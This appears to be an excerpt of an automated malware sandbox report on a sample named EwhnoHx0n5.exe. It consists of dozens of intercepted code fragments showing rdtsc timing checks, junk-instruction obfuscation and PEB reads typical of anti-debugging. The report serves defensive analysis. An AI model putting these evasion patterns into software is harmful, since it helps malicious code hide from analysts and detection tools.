Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EAF3B1 second address: EAF3C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EB139E second address: EB13A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EB13A3 second address: EB13CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pushad 0x00000008 jmp 00007FCBA141C939h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C000A second address: 71C0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 8Fh 0x0000000d mov di, 66E4h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov esi, ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0029 second address: 71C006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA141C939h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FCBA141C938h 0x00000015 pop eax 0x00000016 mov ebx, 0E5939E6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C006C second address: 71C00EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FCBA141FCB0h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA141FCAEh 0x0000001d xor al, FFFFFFB8h 0x00000020 jmp 00007FCBA141FCABh 0x00000025 popfd 0x00000026 mov dx, ax 0x00000029 popad 0x0000002a sub esp, 18h 0x0000002d jmp 00007FCBA141FCB2h 0x00000032 xchg eax, ebx 0x00000033 jmp 00007FCBA141FCB0h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov di, 2AF4h 0x0000003e mov bx, 0260h 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00EF second address: 71C00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00F5 second address: 71C00FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00FB second address: 71C00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00FF second address: 71C0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0103 second address: 71C01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007FCBA141C931h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 jmp 00007FCBA141C92Ch 0x00000017 pushfd 0x00000018 jmp 00007FCBA141C932h 0x0000001d adc si, A238h 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007FCBA141C92Fh 0x00000030 pushfd 0x00000031 jmp 00007FCBA141C938h 0x00000036 add esi, 164E5BC8h 0x0000003c jmp 00007FCBA141C92Bh 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 jmp 00007FCBA141C936h 0x00000049 mov esi, dword ptr [770206ECh] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FCBA141C92Eh 0x00000056 jmp 00007FCBA141C935h 0x0000005b popfd 0x0000005c popad 0x0000005d test esi, esi 0x0000005f pushad 0x00000060 jmp 00007FCBA141C933h 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C01EC second address: 71C0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jne 00007FCBA1420A83h 0x0000000c pushad 0x0000000d mov eax, 42FA383Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCBA141FCB8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0218 second address: 71C021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C021C second address: 71C0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA141FCADh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0233 second address: 71C024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C024F second address: 71C0362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 624Ah 0x00000008 popad 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c jmp 00007FCBA141FCB7h 0x00000011 mov ax, E87Fh 0x00000015 popad 0x00000016 call dword ptr [76FF0B60h] 0x0000001c mov eax, 7571E5E0h 0x00000021 ret 0x00000022 jmp 00007FCBA141FCB2h 0x00000027 push 00000044h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA141FCADh 0x00000030 sbb al, FFFFFFD6h 0x00000033 jmp 00007FCBA141FCB1h 0x00000038 popfd 0x00000039 popad 0x0000003a pop edi 0x0000003b jmp 00007FCBA141FCAEh 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 movzx esi, bx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FCBA141FCB9h 0x0000004c jmp 00007FCBA141FCABh 0x00000051 popfd 0x00000052 pushfd 0x00000053 jmp 00007FCBA141FCB8h 0x00000058 add eax, 6A86BEB8h 0x0000005e jmp 00007FCBA141FCABh 0x00000063 popfd 0x00000064 popad 0x00000065 popad 0x00000066 push eax 0x00000067 jmp 00007FCBA141FCB9h 0x0000006c xchg eax, edi 0x0000006d jmp 00007FCBA141FCAEh 0x00000072 push dword ptr [eax] 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FCBA141FCB7h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0362 second address: 71C037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C037A second address: 71C037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C037E second address: 71C0392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0392 second address: 71C0396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0396 second address: 71C039A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C039A second address: 71C03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03A0 second address: 71C03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03A6 second address: 71C03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCBA141FCB8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03D8 second address: 71C03E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0456 second address: 71C045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C045A second address: 71C045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C045E second address: 71C0464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0464 second address: 71C04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141C930h 0x00000009 xor ah, 00000018h 0x0000000c jmp 00007FCBA141C92Bh 0x00000011 popfd 0x00000012 mov ax, 87CFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub eax, eax 0x0000001b jmp 00007FCBA141C92Bh 0x00000020 mov dword ptr [esi], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04A3 second address: 71C04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04A7 second address: 71C04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04C2 second address: 71C0522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 jmp 00007FCBA141FCB0h 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c jmp 00007FCBA141FCB0h 0x00000021 mov eax, dword ptr [ebx+4Ch] 0x00000024 pushad 0x00000025 push ecx 0x00000026 mov bl, 3Fh 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push edi 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0522 second address: 71C05B6 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 57EDF574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+10h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBA141C939h 0x00000014 sub eax, 510365E6h 0x0000001a jmp 00007FCBA141C931h 0x0000001f popfd 0x00000020 mov cx, A817h 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+50h] 0x00000028 jmp 00007FCBA141C92Ah 0x0000002d mov dword ptr [esi+14h], eax 0x00000030 jmp 00007FCBA141C930h 0x00000035 mov eax, dword ptr [ebx+54h] 0x00000038 jmp 00007FCBA141C930h 0x0000003d mov dword ptr [esi+18h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FCBA141C937h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C05B6 second address: 71C0625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FCBA141FCB0h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d jmp 00007FCBA141FCAEh 0x00000022 mov cx, DAA1h 0x00000026 popad 0x00000027 mov dword ptr [esi+20h], eax 0x0000002a jmp 00007FCBA141FCACh 0x0000002f mov eax, dword ptr [ebx+60h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0625 second address: 71C06B3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA141C938h 0x00000008 and si, E898h 0x0000000d jmp 00007FCBA141C92Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FCBA141C930h 0x00000023 and eax, 081492F8h 0x00000029 jmp 00007FCBA141C92Bh 0x0000002e popfd 0x0000002f mov di, cx 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+64h] 0x00000036 jmp 00007FCBA141C932h 0x0000003b mov dword ptr [esi+28h], eax 0x0000003e jmp 00007FCBA141C930h 0x00000043 mov eax, dword ptr [ebx+68h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06B3 second address: 71C06D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06D0 second address: 71C06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06E0 second address: 71C0709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FCBA141FCB8h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0709 second address: 71C070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C070E second address: 71C0714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0714 second address: 71C0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C92Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0732 second address: 71C0741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08B7 second address: 71C08BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08BD second address: 71C08DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 jmp 00007FCBA141FCACh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08DA second address: 71C090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007FCBA141C936h 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C090D second address: 71C0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0925 second address: 71C092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C092B second address: 71C092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C092F second address: 71C0933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0933 second address: 71C0992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FCBA141FCB7h 0x0000000f nop 0x00000010 jmp 00007FCBA141FCB6h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FCBA141FCACh 0x0000001f xor cx, 4278h 0x00000024 jmp 00007FCBA141FCABh 0x00000029 popfd 0x0000002a mov cx, 55AFh 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0992 second address: 71C09D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCBA141C92Ch 0x00000011 xor cx, AC08h 0x00000016 jmp 00007FCBA141C92Bh 0x0000001b popfd 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C09D8 second address: 71C09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C09DC second address: 71C09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0A9A second address: 71C0AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FCBA141FCAEh 0x00000010 js 00007FCC111FE8AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0AC7 second address: 71C0ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0ACD second address: 71C0B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 01D2C3C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp-0Ch] 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 popad 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 jmp 00007FCBA141FCB1h 0x0000001d lea eax, dword ptr [ebx+78h] 0x00000020 pushad 0x00000021 call 00007FCBA141FCACh 0x00000026 movzx ecx, bx 0x00000029 pop edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FCBA141FCAAh 0x00000031 and al, 00000068h 0x00000034 jmp 00007FCBA141FCABh 0x00000039 popfd 0x0000003a mov ecx, 7587FB5Fh 0x0000003f popad 0x00000040 popad 0x00000041 push 00000001h 0x00000043 jmp 00007FCBA141FCB2h 0x00000048 nop 0x00000049 jmp 00007FCBA141FCB0h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 pop edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0B57 second address: 71C0BFE instructions: 0x00000000 rdtsc 0x00000002 call 00007FCBA141C936h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C937h 0x00000013 jmp 00007FCBA141C933h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FCBA141C938h 0x0000001f xor ah, 00000018h 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 popfd 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FCBA141C92Bh 0x00000035 add si, 92DEh 0x0000003a jmp 00007FCBA141C939h 0x0000003f popfd 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0C93 second address: 71C0CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 call 00007FCBA141FCB8h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edi, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 2D916B59h 0x00000019 mov ax, 6415h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0CC4 second address: 71C0CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c call 00007FCBA141C934h 0x00000011 mov si, 4771h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 mov dl, 6Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0CF3 second address: 71C0D3C instructions: 0x00000000 rdtsc 0x00000002 mov ax, A165h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 js 00007FCC111FE663h 0x0000000f jmp 00007FCBA141FCB0h 0x00000014 mov eax, dword ptr [ebp-04h] 0x00000017 pushad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c popad 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 jmp 00007FCBA141FCB5h 0x00000025 lea eax, dword ptr [ebx+70h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D3C second address: 71C0D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D4F second address: 71C0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D55 second address: 71C0D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D59 second address: 71C0D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D5D second address: 71C0DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FCBA141C937h 0x0000000f nop 0x00000010 jmp 00007FCBA141C936h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ch, bl 0x00000019 mov eax, 0B543499h 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov si, dx 0x00000026 jmp 00007FCBA141C92Dh 0x0000002b popad 0x0000002c rdtsc
